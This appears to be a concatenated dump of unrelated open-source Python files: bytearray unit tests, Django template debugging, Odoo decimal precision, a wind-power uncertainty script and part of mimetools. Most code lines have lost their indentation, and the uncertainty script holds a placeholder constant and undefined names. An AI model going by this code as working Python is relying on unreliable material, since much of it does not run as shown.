self.assertRaises(TypeError, b.translate, rosetta, None)
self.assertRaises(TypeError, b.translate, None, None)
class ByteArrayTest(BaseBytesTest):
type2test = bytearray
def test_nohash(self):
self.assertRaises(TypeError, hash, bytearray())
def test_bytearray_api(self):
short_sample = b"Hello world\n"
sample = short_sample + b"\0"*(20 - len(short_sample))
tfn = tempfile.mktemp()
try:
# Prepare
with open(tfn, "wb") as f:
f.write(short_sample)
# Test readinto
with open(tfn, "rb") as f:
b = bytearray(20)
n = f.readinto(b)
self.assertEqual(n, len(short_sample))
                # Python 2.x: file data is a str, so compare via ord()
b_sample = (ord(s) for s in sample)
self.assertEqual(list(b), list(b_sample))
# Test writing in binary mode
with open(tfn, "wb") as f:
f.write(b)
with open(tfn, "rb") as f:
self.assertEqual(f.read(), sample)
# Text mode is ambiguous; don't test
finally:
try:
os.remove(tfn)
except os.error:
pass
def test_reverse(self):
b = bytearray(b'hello')
self.assertEqual(b.reverse(), None)
self.assertEqual(b, b'olleh')
b = bytearray(b'hello1') # test even number of items
b.reverse()
self.assertEqual(b, b'1olleh')
b = bytearray()
b.reverse()
self.assertFalse(b)
def test_regexps(self):
def by(s):
return bytearray(map(ord, s))
b = by("Hello, world")
self.assertEqual(re.findall(r"\w+", b), [by("Hello"), by("world")])
def test_setitem(self):
b = bytearray([1, 2, 3])
b[1] = 100
self.assertEqual(b, bytearray([1, 100, 3]))
b[-1] = 200
self.assertEqual(b, bytearray([1, 100, 200]))
b[0] = Indexable(10)
self.assertEqual(b, bytearray([10, 100, 200]))
try:
b[3] = 0
self.fail("Didn't raise IndexError")
except IndexError:
pass
try:
b[-10] = 0
self.fail("Didn't raise IndexError")
except IndexError:
pass
try:
b[0] = 256
self.fail("Didn't raise ValueError")
except ValueError:
pass
try:
b[0] = Indexable(-1)
self.fail("Didn't raise ValueError")
except ValueError:
pass
try:
b[0] = None
self.fail("Didn't raise TypeError")
except TypeError:
pass
def test_delitem(self):
b = bytearray(range(10))
del b[0]
self.assertEqual(b, bytearray(range(1, 10)))
del b[-1]
self.assertEqual(b, bytearray(range(1, 9)))
del b[4]
self.assertEqual(b, bytearray([1, 2, 3, 4, 6, 7, 8]))
def test_setslice(self):
b = bytearray(range(10))
self.assertEqual(list(b), list(range(10)))
b[0:5] = bytearray([1, 1, 1, 1, 1])
self.assertEqual(b, bytearray([1, 1, 1, 1, 1, 5, 6, 7, 8, 9]))
del b[0:-5]
self.assertEqual(b, bytearray([5, 6, 7, 8, 9]))
b[0:0] = bytearray([0, 1, 2, 3, 4])
self.assertEqual(b, bytearray(range(10)))
b[-7:-3] = bytearray([100, 101])
self.assertEqual(b, bytearray([0, 1, 2, 100, 101, 7, 8, 9]))
b[3:5] = [3, 4, 5, 6]
self.assertEqual(b, bytearray(range(10)))
b[3:0] = [42, 42, 42]
self.assertEqual(b, bytearray([0, 1, 2, 42, 42, 42, 3, 4, 5, 6, 7, 8, 9]))
def test_extended_set_del_slice(self):
indices = (0, None, 1, 3, 19, 300, 1<<333, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip invalid step 0
for step in indices[1:]:
L = list(range(255))
b = bytearray(L)
# Make sure we have a slice of exactly the right length,
# but with different data.
data = L[start:stop:step]
data.reverse()
L[start:stop:step] = data
b[start:stop:step] = data
self.assertEqual(b, bytearray(L))
del L[start:stop:step]
del b[start:stop:step]
self.assertEqual(b, bytearray(L))
def test_setslice_trap(self):
# This test verifies that we correctly handle assigning self
# to a slice of self (the old Lambert Meertens trap).
b = bytearray(range(256))
b[8:] = b
self.assertEqual(b, bytearray(list(range(8)) + list(range(256))))
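        # Without an internal copy, writing b into b[8:] would read from
        # the very region being overwritten; the expected value keeps the
        # first 8 bytes and then appends all 256 original bytes.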
def test_iconcat(self):
b = bytearray(b"abc")
b1 = b
b += b"def"
self.assertEqual(b, b"abcdef")
self.assertEqual(b, b1)
self.assertTrue(b is b1)
b += b"xyz"
self.assertEqual(b, b"abcdefxyz")
try:
b += u""
except TypeError:
pass
else:
self.fail("bytes += unicode didn't raise TypeError")
def test_irepeat(self):
b = bytearray(b"abc")
b1 = b
b *= 3
self.assertEqual(b, b"abcabcabc")
self.assertEqual(b, b1)
self.assertTrue(b is b1)
def test_irepeat_1char(self):
b = bytearray(b"x")
b1 = b
b *= 100
self.assertEqual(b, b"x"*100)
self.assertEqual(b, b1)
self.assertTrue(b is b1)
def test_alloc(self):
b = bytearray()
alloc = b.__alloc__()
self.assertTrue(alloc >= 0)
seq = [alloc]
for i in range(100):
b += b"x"
alloc = b.__alloc__()
self.assertTrue(alloc >= len(b))
if alloc not in seq:
seq.append(alloc)
def test_extend(self):
orig = b'hello'
a = bytearray(orig)
a.extend(a)
self.assertEqual(a, orig + orig)
self.assertEqual(a[5:], orig)
a = bytearray(b'')
# Test iterators that don't have a __length_hint__
a.extend(map(ord, orig * 25))
a.extend(ord(x) for x in orig * 25)
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
a.extend(iter(map(ord, orig * 50)))
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
a.extend(list(map(ord, orig * 50)))
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
self.assertRaises(ValueError, a.extend, [0, 1, 2, 256])
self.assertRaises(ValueError, a.extend, [0, 1, 2, -1])
self.assertEqual(len(a), 0)
a = bytearray(b'')
a.extend([Indexable(ord('a'))])
self.assertEqual(a, b'a')
def test_remove(self):
b = bytearray(b'hello')
b.remove(ord('l'))
self.assertEqual(b, b'helo')
b.remove(ord('l'))
self.assertEqual(b, b'heo')
self.assertRaises(ValueError, lambda: b.remove(ord('l')))
self.assertRaises(ValueError, lambda: b.remove(400))
self.assertRaises(TypeError, lambda: b.remove(u'e'))
# remove first and last
b.remove(ord('o'))
b.remove(ord('h'))
self.assertEqual(b, b'e')
self.assertRaises(TypeError, lambda: b.remove(u'e'))
b.remove(Indexable(ord('e')))
self.assertEqual(b, b'')
def test_pop(self):
b = bytearray(b'world')
self.assertEqual(b.pop(), ord('d'))
self.assertEqual(b.pop(0), ord('w'))
self.assertEqual(b.pop(-2), ord('r'))
self.assertRaises(IndexError, lambda: b.pop(10))
self.assertRaises(IndexError, lambda: bytearray().pop())
# test for issue #6846
self.assertEqual(bytearray(b'\xff').pop(), 0xff)
def test_nosort(self):
self.assertRaises(AttributeError, lambda: bytearray().sort())
def test_append(self):
b = bytearray(b'hell')
b.append(ord('o'))
self.assertEqual(b, b'hello')
self.assertEqual(b.append(100), None)
b = bytearray()
b.append(ord('A'))
self.assertEqual(len(b), 1)
self.assertRaises(TypeError, lambda: b.append(u'o'))
b = bytearray()
b.append(Indexable(ord('A')))
self.assertEqual(b, b'A')
def test_insert(self):
b = bytearray(b'msssspp')
b.insert(1, ord('i'))
b.insert(4, ord('i'))
b.insert(-2, ord('i'))
b.insert(1000, ord('i'))
self.assertEqual(b, b'mississippi')
# allowed in 2.x
#self.assertRaises(TypeError, lambda: b.insert(0, b'1'))
b = bytearray()
b.insert(0, Indexable(ord('A')))
self.assertEqual(b, b'A')
def test_copied(self):
# Issue 4348. Make sure that operations that don't mutate the array
# copy the bytes.
b = bytearray(b'abc')
self.assertFalse(b is b.replace(b'abc', b'cde', 0))
t = bytearray([i for i in range(256)])
x = bytearray(b'')
self.assertFalse(x is x.translate(t))
def test_partition_bytearray_doesnt_share_nullstring(self):
a, b, c = bytearray(b"x").partition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
self.assertTrue(b is not c)
b += b"!"
self.assertEqual(c, b"")
a, b, c = bytearray(b"x").partition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
# Same for rpartition
b, c, a = bytearray(b"x").rpartition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
self.assertTrue(b is not c)
b += b"!"
self.assertEqual(c, b"")
c, b, a = bytearray(b"x").rpartition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
def test_resize_forbidden(self):
# #4509: can't resize a bytearray when there are buffer exports, even
# if it wouldn't reallocate the underlying buffer.
# Furthermore, no destructive changes to the buffer may be applied
# before raising the error.
b = bytearray(range(10))
v = memoryview(b)
def resize(n):
b[1:-1] = range(n + 1, 2*n - 1)
resize(10)
orig = b[:]
self.assertRaises(BufferError, resize, 11)
self.assertEqual(b, orig)
self.assertRaises(BufferError, resize, 9)
self.assertEqual(b, orig)
self.assertRaises(BufferError, resize, 0)
self.assertEqual(b, orig)
# Other operations implying resize
self.assertRaises(BufferError, b.pop, 0)
self.assertEqual(b, orig)
self.assertRaises(BufferError, b.remove, b[1])
self.assertEqual(b, orig)
def delitem():
del b[1]
self.assertRaises(BufferError, delitem)
self.assertEqual(b, orig)
# deleting a non-contiguous slice
def delslice():
b[1:-1:2] = b""
self.assertRaises(BufferError, delslice)
self.assertEqual(b, orig)
if test.test_support.is_jython:
# Show that releasing v releases the bytearray for size change
v.release()
b.pop()
def test_empty_bytearray(self):
# Issue #7561: operations on empty bytearrays could crash in many
# situations, due to a fragile implementation of the
# PyByteArray_AS_STRING() C macro.
self.assertRaises(ValueError, int, bytearray(b''))
class AssortedBytesTest(unittest.TestCase):
#
# Test various combinations of bytes and bytearray
#
@check_bytes_warnings
def test_repr_str(self):
for f in str, repr:
self.assertEqual(f(bytearray()), "bytearray(b'')")
self.assertEqual(f(bytearray([0])), "bytearray(b'\\x00')")
self.assertEqual(f(bytearray([0, 1, 254, 255])),
"bytearray(b'\\x00\\x01\\xfe\\xff')")
self.assertEqual(f(b"abc"), "b'abc'")
self.assertEqual(f(b"'"), '''b"'"''') # '''
self.assertEqual(f(b"'\""), r"""b'\'"'""") # '
def test_compare_bytes_to_bytearray(self):
self.assertEqual(b"abc" == bytes(b"abc"), True)
self.assertEqual(b"ab" != bytes(b"abc"), True)
self.assertEqual(b"ab" <= bytes(b"abc"), True)
self.assertEqual(b"ab" < bytes(b"abc"), True)
self.assertEqual(b"abc" >= bytes(b"ab"), True)
self.assertEqual(b"abc" > bytes(b"ab"), True)
self.assertEqual(b"abc" != bytes(b"abc"), False)
self.assertEqual(b"ab" == bytes(b"abc"), False)
self.assertEqual(b"ab" > bytes(b"abc"), False)
self.assertEqual(b"ab" >= bytes(b"abc"), False)
self.assertEqual(b"abc" < bytes(b"ab"), False)
self.assertEqual(b"abc" <= bytes(b"ab"), False)
self.assertEqual(bytes(b"abc") == b"abc", True)
self.assertEqual(bytes(b"ab") != b"abc", True)
self.assertEqual(bytes(b"ab") <= b"abc", True)
self.assertEqual(bytes(b"ab") < b"abc", True)
self.assertEqual(bytes(b"abc") >= b"ab", True)
self.assertEqual(bytes(b"abc") > b"ab", True)
self.assertEqual(bytes(b"abc") != b"abc", False)
self.assertEqual(bytes(b"ab") == b"abc", False)
self.assertEqual(bytes(b"ab") > b"abc", False)
self.assertEqual(bytes(b"ab") >= b"abc", False)
self.assertEqual(bytes(b"abc") < b"ab", False)
self.assertEqual(bytes(b"abc") <= b"ab", False)
def test_doc(self):
self.assertIsNotNone(bytearray.__doc__)
self.assertTrue(bytearray.__doc__.startswith("bytearray("), bytearray.__doc__)
self.assertIsNotNone(bytes.__doc__)
self.assertTrue(bytes.__doc__.startswith("bytes("), bytes.__doc__)
def test_from_bytearray(self):
sample = bytes(b"Hello world\n\x80\x81\xfe\xff")
buf = memoryview(sample)
b = bytearray(buf)
self.assertEqual(b, bytearray(sample))
@check_bytes_warnings
def test_to_str(self):
self.assertEqual(str(b''), "b''")
self.assertEqual(str(b'x'), "b'x'")
self.assertEqual(str(b'\x80'), "b'\\x80'")
self.assertEqual(str(bytearray(b'')), "bytearray(b'')")
self.assertEqual(str(bytearray(b'x')), "bytearray(b'x')")
self.assertEqual(str(bytearray(b'\x80')), "bytearray(b'\\x80')")
def test_literal(self):
tests = [
(b"Wonderful spam", "Wonderful spam"),
(br"Wonderful spam too", "Wonderful spam too"),
(b"\xaa\x00\000\200", "\xaa\x00\000\200"),
(br"\xaa\x00\000\200", r"\xaa\x00\000\200"),
]
for b, s in tests:
self.assertEqual(b, bytearray(s, 'latin-1'))
for c in range(128, 256):
self.assertRaises(SyntaxError, eval,
'b"%s"' % chr(c))
def test_translate(self):
b = b'hello'
ba = bytearray(b)
rosetta = bytearray(range(0, 256))
rosetta[ord('o')] = ord('e')
c = b.translate(rosetta, b'l')
self.assertEqual(b, b'hello')
self.assertEqual(c, b'hee')
c = ba.translate(rosetta, b'l')
self.assertEqual(ba, b'hello')
self.assertEqual(c, b'hee')
c = b.translate(None, b'e')
self.assertEqual(c, b'hllo')
c = ba.translate(None, b'e')
self.assertEqual(c, b'hllo')
self.assertRaises(TypeError, b.translate, None, None)
self.assertRaises(TypeError, ba.translate, None, None)
def test_split_bytearray(self):
self.assertEqual(b'a b'.split(memoryview(b' ')), [b'a', b'b'])
def test_rsplit_bytearray(self):
self.assertEqual(b'a b'.rsplit(memoryview(b' ')), [b'a', b'b'])
# Optimizations:
# __iter__? (optimization)
# __reversed__? (optimization)
# XXX More string methods? (Those that don't use character properties)
# There are tests in string_tests.py that are more
# comprehensive for things like split, partition, etc.
# Unfortunately they are all bundled with tests that
# are not appropriate for bytes
# I've started porting some of those into bytearray_tests.py, we should port
# the rest that make sense (the code can be cleaned up to use modern
# unittest methods at the same time).
class BytearrayPEP3137Test(unittest.TestCase,
test.buffer_tests.MixinBytesBufferCommonTests):
def marshal(self, x):
return bytearray(x)
def test_returns_new_copy(self):
val = self.marshal(b'1234')
# On immutable types these MAY return a reference to themselves
# but on mutable types like bytearray they MUST return a new copy.
for methname in ('zfill', 'rjust', 'ljust', 'center'):
method = getattr(val, methname)
newval = method(3)
self.assertEqual(val, newval)
self.assertTrue(val is not newval,
methname+' returned self on a mutable object')
for expr in ('val.split()[0]', 'val.rsplit()[0]',
'val.partition(".")[0]', 'val.rpartition(".")[2]',
'val.splitlines()[0]', 'val.replace("", "")'):
newval = eval(expr)
self.assertEqual(val, newval)
self.assertTrue(val is not newval,
expr+' returned val on a mutable object')
class FixedStringTest(test.string_tests.BaseTest):
def fixtype(self, obj):
if isinstance(obj, str):
return obj.encode("utf-8")
return super(FixedStringTest, self).fixtype(obj)
    # Currently bytes containment testing uses a single integer value,
    # so the inherited string containment tests are not valid for bytes;
    # skip them until the design is final.
def test_contains(self):
pass
def test_expandtabs(self):
pass
def test_upper(self):
pass
def test_lower(self):
pass
def test_hash(self):
# XXX check this out
pass
class ByteArrayAsStringTest(FixedStringTest):
type2test = bytearray
class ByteArraySubclass(bytearray):
pass
class ByteArraySubclassTest(unittest.TestCase):
def test_basic(self):
self.assertTrue(issubclass(ByteArraySubclass, bytearray))
self.assertIsInstance(ByteArraySubclass(), bytearray)
a, b = b"abcd", b"efgh"
_a, _b = ByteArraySubclass(a), ByteArraySubclass(b)
# test comparison operators with subclass instances
self.assertTrue(_a == _a)
self.assertTrue(_a != _b)
self.assertTrue(_a < _b)
self.assertTrue(_a <= _b)
self.assertTrue(_b >= _a)
self.assertTrue(_b > _a)
self.assertTrue(_a is not a)
# test concat of subclass instances
self.assertEqual(a + b, _a + _b)
self.assertEqual(a + b, a + _b)
self.assertEqual(a + b, _a + b)
# test repeat
self.assertTrue(a*5 == _a*5)
def test_join(self):
# Make sure join returns a NEW object for single item sequences
# involving a subclass.
# Make sure that it is of the appropriate type.
s1 = ByteArraySubclass(b"abcd")
s2 = bytearray().join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is bytearray, type(s2))
# Test reverse, calling join on subclass
s3 = s1.join([b"abcd"])
self.assertTrue(type(s3) is bytearray)
def test_pickle(self):
a = ByteArraySubclass(b"abcd")
a.x = 10
a.y = ByteArraySubclass(b"efgh")
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
b = pickle.loads(pickle.dumps(a, proto))
self.assertNotEqual(id(a), id(b))
self.assertEqual(a, b)
self.assertEqual(a.x, b.x)
self.assertEqual(a.y, b.y)
self.assertEqual(type(a), type(b))
self.assertEqual(type(a.y), type(b.y))
def test_copy(self):
a = ByteArraySubclass(b"abcd")
a.x = 10
a.y = ByteArraySubclass(b"efgh")
for copy_method in (copy.copy, copy.deepcopy):
b = copy_method(a)
self.assertNotEqual(id(a), id(b))
self.assertEqual(a, b)
self.assertEqual(a.x, b.x)
self.assertEqual(a.y, b.y)
self.assertEqual(type(a), type(b))
self.assertEqual(type(a.y), type(b.y))
def test_init_override(self):
class subclass(bytearray):
def __init__(self, newarg=1, *args, **kwargs):
bytearray.__init__(self, *args, **kwargs)
x = subclass(4, source=b"abcd")
self.assertEqual(x, b"abcd")
x = subclass(newarg=4, source=b"abcd")
self.assertEqual(x, b"abcd")
def test_main():
#test.test_support.run_unittest(BytesTest)
#test.test_support.run_unittest(AssortedBytesTest)
#test.test_support.run_unittest(BytesAsStringTest)
test.test_support.run_unittest(
ByteArrayTest,
ByteArrayAsStringTest,
ByteArraySubclassTest,
BytearrayPEP3137Test)
if __name__ == "__main__":
test_main()
|
openhatch/new-mini-tasks
|
refs/heads/master
|
vendor/packages/Django/django/template/debug.py
|
110
|
from django.template.base import Lexer, Parser, tag_re, NodeList, VariableNode, TemplateSyntaxError
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.safestring import SafeData, EscapeData
from django.utils.formats import localize
from django.utils.timezone import template_localtime
class DebugLexer(Lexer):
def __init__(self, template_string, origin):
super(DebugLexer, self).__init__(template_string, origin)
def tokenize(self):
"Return a list of tokens from a given template_string"
result, upto = [], 0
for match in tag_re.finditer(self.template_string):
start, end = match.span()
if start > upto:
result.append(self.create_token(self.template_string[upto:start], (upto, start), False))
upto = start
result.append(self.create_token(self.template_string[start:end], (start, end), True))
upto = end
last_bit = self.template_string[upto:]
if last_bit:
result.append(self.create_token(last_bit, (upto, upto + len(last_bit)), False))
return result
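    # Illustrative: for a template string "Hi {{ name }}!" tokenize()
    # returns three tokens (text "Hi ", variable "{{ name }}", text "!"),
    # each annotated with its (start, end) source span by create_token.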
def create_token(self, token_string, source, in_tag):
token = super(DebugLexer, self).create_token(token_string, in_tag)
token.source = self.origin, source
return token
class DebugParser(Parser):
def __init__(self, lexer):
super(DebugParser, self).__init__(lexer)
self.command_stack = []
def enter_command(self, command, token):
self.command_stack.append( (command, token.source) )
def exit_command(self):
self.command_stack.pop()
def error(self, token, msg):
return self.source_error(token.source, msg)
def source_error(self, source, msg):
e = TemplateSyntaxError(msg)
e.django_template_source = source
return e
def create_nodelist(self):
return DebugNodeList()
def create_variable_node(self, contents):
return DebugVariableNode(contents)
def extend_nodelist(self, nodelist, node, token):
node.source = token.source
super(DebugParser, self).extend_nodelist(nodelist, node, token)
def unclosed_block_tag(self, parse_until):
command, source = self.command_stack.pop()
msg = "Unclosed tag '%s'. Looking for one of: %s " % (command, ', '.join(parse_until))
raise self.source_error(source, msg)
def compile_function_error(self, token, e):
if not hasattr(e, 'django_template_source'):
e.django_template_source = token.source
class DebugNodeList(NodeList):
def render_node(self, node, context):
try:
return node.render(context)
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = node.source
raise
class DebugVariableNode(VariableNode):
def render(self, context):
try:
output = self.filter_expression.resolve(context)
output = template_localtime(output, use_tz=context.use_tz)
output = localize(output, use_l10n=context.use_l10n)
output = force_text(output)
except UnicodeDecodeError:
return ''
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = self.source
raise
if (context.autoescape and not isinstance(output, SafeData)) or isinstance(output, EscapeData):
return escape(output)
else:
return output
|
youdonghai/intellij-community
|
refs/heads/master
|
python/testData/refactoring/introduceConstant/py1840EntireLine.py
|
83
|
<selection>exec(open("tmp.txt").read())</selection>
|
tmkasun/Knnect
|
refs/heads/master
|
server_core/repo/core/event_porcessor.py
|
1
|
class IEventProcessor(object):
def __init__(self):
pass
def data_in(self, geojson):
raise NotImplementedError("Subclass need to implement this method")
def data_out(self, geojson):
raise NotImplementedError("Subclass need to implement this method")
|
coillarach/PCWG
|
refs/heads/master
|
uncertainty.py
|
5
|
import pandas as pd
import numpy as np
import datetime
import math
import binning
class Config:
def __init__(self):
self.inputTimeSeriesPath = "test.dat"
self.timeStamp = "Date & Time Stamp"
self.actualPower = "Power"
self.inputHubWindSpeed = "WindSpeed"
self.dateFormat = "%d/%m/%y %H:%M"
self.headerRows = 0
self.badData = -99.99
self.ratedPower = 2000.0
class CategoryBAnemometerOrSonicUncertainty:
def __init__(self, windSpeed, mounting_applied, alternativeMounting_applied, sideMounted_applied, lightningFinal_applied):
self.calibration = 0.05 #From E.20
self.postCalibration = 0.05 #From E.20
self.totalCalibration = math.sqrt(self.calibration ** 2.0 + self.postCalibration ** 2.0) #From E.20
self.classUncertainty = (0.05 + 0.005 * windSpeed) * 1.2 / math.sqrt(3.0) #From E.21
if mounting_applied:
self.mounting = 0.01 * windSpeed #From E.19
else:
self.mounting = 0.0
if alternativeMounting_applied:
self.alternativeMounting = 0.015 * windSpeed #From E.19
else:
self.alternativeMounting = 0.0
if sideMounted_applied:
self.sideMounted = 0.015 * windSpeed #From E.19
else:
self.sideMounted = 0.0
if lightningFinal_applied:
self.lightningFinal = 0.01 * windSpeed #From E.19
else:
self.lightningFinal = 0.0
self.DAQ = 30.0 * 0.1 #From E.19
self.totalWindSpeedUncertainty = math.sqrt(self.totalCalibration ** 2.0
+ self.classUncertainty ** 2.0
+ self.mounting ** 2.0
+ self.alternativeMounting ** 2.0
+ self.sideMounted ** 2.0
+ self.lightningFinal ** 2.0
+ self.DAQ ** 2.0)
        self.sensitivityFactor = 99.0  # TODO: placeholder; compute from E.31
self.totalCategoryBUncertainty = self.totalWindSpeedUncertainty * self.sensitivityFactor
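# The wind speed terms above are combined in quadrature (root-sum-square);
# the E.xx references appear to be to the uncertainty annex of the power
# performance measurement standard (presumably IEC 61400-12-1 Annex E).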
class CategoryBPowerUncertainty:
def __init__(self, power, uPdyn_Applied, uPVT_Applied):
if uPdyn_Applied:
self.uPdyn = 0.001 * power #From E.14
else:
self.uPdyn = 0.0
self.udP = (1.25-(-0.25)) * 0.0010 * power #From E.14
self.uPCT = 0.0075 * abs(power) / math.sqrt(3) #From E.15
if uPVT_Applied:
self.uPVT = 0.0050 * abs(power)/ math.sqrt(3.0) #From E.16
else:
self.uPVT = 0.0
self.uPPT = config.ratedPower * 1.50 * 0.0050 / math.sqrt(3) #From E.17
self.totalCategoryBUncertainty = math.sqrt(self.uPdyn ** 2.0 + self.udP ** 2.0 + self.uPCT ** 2.0 + self.uPVT ** 2.0 + self.uPPT ** 2.0)
class Analysis:
def __init__(self, config):
dateConverter = lambda x: datetime.datetime.strptime(x, config.dateFormat)
self.windSpeedBin = "WindSpeedBin"
self.windSpeedBins = binning.Bins(1.0, 1, 30.0)
self.aggregations = binning.Aggregations(minimumCount=1)
dataFrame = pd.read_csv(config.inputTimeSeriesPath, index_col=config.timeStamp, parse_dates = True, date_parser = dateConverter, sep = '\t', skiprows = config.headerRows).replace(config.badData, np.nan)
dataFrame[self.windSpeedBin] = dataFrame[config.inputHubWindSpeed].map(self.windSpeedBins.binCenter)
powers = dataFrame[config.actualPower].groupby(dataFrame[self.windSpeedBin]).aggregate(self.aggregations.average)
stdErrorPowers = dataFrame[config.actualPower].groupby(dataFrame[self.windSpeedBin]).aggregate(self.aggregations.standardError)
        uPdyn_Applied = True
        uPVT_Applied = True
        catBPowerUncertainty = {}
for windSpeed in self.windSpeedBins.centers:
if windSpeed in powers:
power = powers[windSpeed]
catBPowerUncertainty[windSpeed] = CategoryBPowerUncertainty(power, uPdyn_Applied = uPdyn_Applied, uPVT_Applied = uPVT_Applied)
                print catBPowerUncertainty[windSpeed].totalCategoryBUncertainty
config = Config()
analysis = Analysis(config)
|
bwrsandman/OpenUpgrade
|
refs/heads/8.0
|
addons/decimal_precision/decimal_precision.py
|
233
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import orm, fields
from openerp.modules.registry import RegistryManager
class decimal_precision(orm.Model):
_name = 'decimal.precision'
_columns = {
'name': fields.char('Usage', select=True, required=True),
'digits': fields.integer('Digits', required=True),
}
_defaults = {
'digits': 2,
}
_sql_constraints = [
('name_uniq', 'unique (name)', """Only one value can be defined for each given usage!"""),
]
@tools.ormcache(skiparg=3)
def precision_get(self, cr, uid, application):
cr.execute('select digits from decimal_precision where name=%s', (application,))
res = cr.fetchone()
return res[0] if res else 2
def clear_cache(self, cr):
"""clear cache and update models. Notify other workers to restart their registry."""
self.precision_get.clear_cache(self)
RegistryManager.signal_registry_change(cr.dbname)
def create(self, cr, uid, data, context=None):
res = super(decimal_precision, self).create(cr, uid, data, context=context)
self.clear_cache(cr)
return res
def unlink(self, cr, uid, ids, context=None):
res = super(decimal_precision, self).unlink(cr, uid, ids, context=context)
self.clear_cache(cr)
return res
def write(self, cr, uid, ids, data, *args, **argv):
res = super(decimal_precision, self).write(cr, uid, ids, data, *args, **argv)
self.clear_cache(cr)
return res
def get_precision(application):
def change_digit(cr):
decimal_precision = openerp.registry(cr.dbname)['decimal.precision']
res = decimal_precision.precision_get(cr, SUPERUSER_ID, application)
return (16, res)
return change_digit
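# Typical usage sketch (illustrative, not part of this module): an addon
# declares a float column whose digits follow the 'Account' usage record;
# the 'Account' name and the 'amount' field are assumptions for the example.
#
#   import openerp.addons.decimal_precision as dp
#
#   _columns = {
#       'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
#   }
#
# get_precision() returns a callable, so the digits are re-read from the
# decimal.precision records whenever the registry recomputes field digits.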
class DecimalPrecisionFloat(orm.AbstractModel):
""" Override qweb.field.float to add a `decimal_precision` domain option
and use that instead of the column's own value if it is specified
"""
_inherit = 'ir.qweb.field.float'
def precision(self, cr, uid, field, options=None, context=None):
dp = options and options.get('decimal_precision')
if dp:
return self.pool['decimal.precision'].precision_get(
cr, uid, dp)
return super(DecimalPrecisionFloat, self).precision(
cr, uid, field, options=options, context=context)
class DecimalPrecisionTestModel(orm.Model):
_name = 'decimal.precision.test'
_columns = {
'float': fields.float(),
'float_2': fields.float(digits=(16, 2)),
'float_4': fields.float(digits=(16, 4)),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
flwh/KK_mt6589_iq451
|
refs/heads/master
|
prebuilts/python/linux-x86/2.7.5/lib/python2.7/mimetools.py
|
334
|
"""Various tools used by MIME-reading or MIME-writing programs."""
import os
import sys
import tempfile
from warnings import filterwarnings, catch_warnings
with catch_warnings():
if sys.py3kwarning:
filterwarnings("ignore", ".*rfc822 has been removed", DeprecationWarning)
import rfc822
from warnings import warnpy3k
warnpy3k("in 3.x, mimetools has been removed in favor of the email package",
stacklevel=2)
__all__ = ["Message","choose_boundary","encode","decode","copyliteral",
"copybinary"]
class Message(rfc822.Message):
"""A derived class of rfc822.Message that knows about MIME headers and
contains some hooks for decoding encoded and multipart messages."""
def __init__(self, fp, seekable = 1):
rfc822.Message.__init__(self, fp, seekable)
self.encodingheader = \
self.getheader('content-transfer-encoding')
self.typeheader = \
self.getheader('content-type')
self.parsetype()
self.parseplist()
def parsetype(self):
str = self.typeheader
if str is None:
str = 'text/plain'
if ';' in str:
i = str.index(';')
self.plisttext = str[i:]
str = str[:i]
else:
self.plisttext = ''
fields = str.split('/')
for i in range(len(fields)):
fields[i] = fields[i].strip().lower()
self.type = '/'.join(fields)
self.maintype = fields[0]
self.subtype = '/'.join(fields[1:])
def parseplist(self):
str = self.plisttext
self.plist = []
while str[:1] == ';':
str = str[1:]
if ';' in str:
# XXX Should parse quotes!
end = str.index(';')
else:
end = len(str)
f = str[:end]
if '=' in f:
i = f.index('=')
f = f[:i].strip().lower() + \
'=' + f[i+1:].strip()
self.plist.append(f.strip())
str = str[end:]
def getplist(self):
return self.plist
def getparam(self, name):
name = name.lower() + '='
n = len(name)
for p in self.plist:
if p[:n] == name:
return rfc822.unquote(p[n:])
return None
def getparamnames(self):
result = []
for p in self.plist:
i = p.find('=')
if i >= 0:
result.append(p[:i].lower())
return result
def getencoding(self):
if self.encodingheader is None:
return '7bit'
return self.encodingheader.lower()
def gettype(self):
return self.type
def getmaintype(self):
return self.maintype
def getsubtype(self):
return self.subtype
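    # Illustrative usage sketch (not part of the original module); the header
    # values below are made up:
    #
    #   from StringIO import StringIO
    #   m = Message(StringIO('Content-Type: text/html; charset=utf-8\n\n'))
    #   m.gettype()            # -> 'text/html'
    #   m.getmaintype()        # -> 'text'
    #   m.getparam('charset')  # -> 'utf-8'
    #   m.getencoding()        # -> '7bit' (no Content-Transfer-Encoding header)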
# Utility functions
# -----------------
try:
import thread
except ImportError:
import dummy_thread as thread
_counter_lock = thread.allocate_lock()
del thread
_counter = 0
def _get_next_counter():
global _counter
_counter_lock.acquire()
_counter += 1
result = _counter
_counter_lock.release()
return result
_prefix = None
def choose_boundary():
"""Return a string usable as a multipart boundary.
The string chosen is unique within a single program run, and
incorporates the user id (if available), process id (if available),
and current time. So it's very unlikely the returned string appears
in message text, but there's no guarantee.
The boundary contains dots so you have to quote it in the header."""
global _prefix
import time
if _prefix is None:
import socket
try:
